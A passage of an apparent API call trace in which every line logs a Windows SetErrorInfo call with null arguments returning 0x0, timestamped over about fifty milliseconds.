[0061.380] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.380] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.380] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.380] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.381] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.381] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.381] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.381] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.381] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.381] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.381] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.381] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.382] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.382] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.382] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.382] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.382] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.382] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.382] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.382] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.382] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.383] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.383] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.383] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.383] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.383] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.383] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.384] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.384] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.384] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.384] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.384] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.384] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.384] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.385] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.385] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.385] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.385] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.385] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.385] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.385] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.385] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.385] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.386] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.386] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.386] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.386] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.386] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.386] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.386] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.387] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.387] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.387] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.387] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.387] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.387] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.387] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.388] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.388] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.388] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.388] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.388] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.388] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.389] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.389] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.389] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.389] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.389] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.389] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.389] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.390] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.390] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.390] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.390] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.390] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.390] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.390] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.390] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.390] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.390] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.391] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.391] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.391] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.391] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.391] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.391] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.391] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.391] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.391] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.392] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.392] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.392] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.392] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.392] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.392] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.392] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.392] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.392] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.392] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.392] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.392] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.393] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.393] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.393] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.393] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.393] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.393] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.393] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.393] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.393] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.393] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.394] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.394] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.394] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.394] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.394] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.394] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.394] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.394] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.394] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.394] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.394] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.394] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.394] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.394] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.394] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.394] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.394] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.394] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.394] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.394] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.394] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.395] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.395] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.395] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.395] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.395] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.395] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.395] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.395] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.395] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.395] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.395] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.395] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.395] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.395] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.395] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.395] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.395] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.396] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.396] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.396] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.396] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.396] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.396] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.396] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.396] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.396] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.396] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.396] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.396] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.396] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.396] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.396] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.396] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.397] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.397] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.397] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.397] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.397] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.397] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.397] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.397] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.397] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.397] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.397] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.398] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.398] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.398] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.398] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.398] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.398] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.398] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.398] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.398] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.398] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.399] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.399] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.399] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.399] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.399] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.399] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.399] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.399] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.399] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.399] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.399] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.399] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.399] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.400] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.400] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.400] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.400] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.400] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.400] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.400] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.400] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.400] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.401] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.401] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.401] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.401] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.401] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.413] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.413] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.413] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.413] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.413] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.413] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.413] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.414] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.414] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.414] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.414] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.414] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.414] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.414] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.414] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.414] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.414] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.414] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.414] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.414] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.414] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.414] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.414] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.414] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.414] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.414] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.414] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.414] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.415] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.415] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.415] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.415] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.415] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.415] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.415] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.415] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.415] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.415] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.415] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.415] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.415] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.415] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.415] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.415] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.415] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.415] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.415] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.415] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.416] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.416] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.416] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.416] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.416] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.416] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.416] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.416] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.416] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.416] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.416] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.416] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.416] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.416] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.416] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.416] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.417] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.417] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.417] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.417] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.417] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.417] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.417] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.418] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.418] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.418] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.418] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.418] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.418] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.418] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.418] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.418] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.418] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.418] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.418] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.418] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.418] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.419] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.419] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.419] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.419] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.419] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.420] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.420] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.420] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.420] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.420] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.421] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.421] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.421] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.421] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.421] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.421] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.422] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.422] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.422] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.422] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.422] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.423] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.423] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.423] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.423] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.423] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.423] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.424] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.424] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.424] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.424] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.424] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.424] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.425] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.425] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.425] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.425] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.425] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.426] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.426] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.426] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.426] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.426] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.427] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.427] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.427] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.427] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.427] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.427] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.427] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.427] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.428] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.428] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.428] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.428] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.428] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.428] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.429] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.429] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
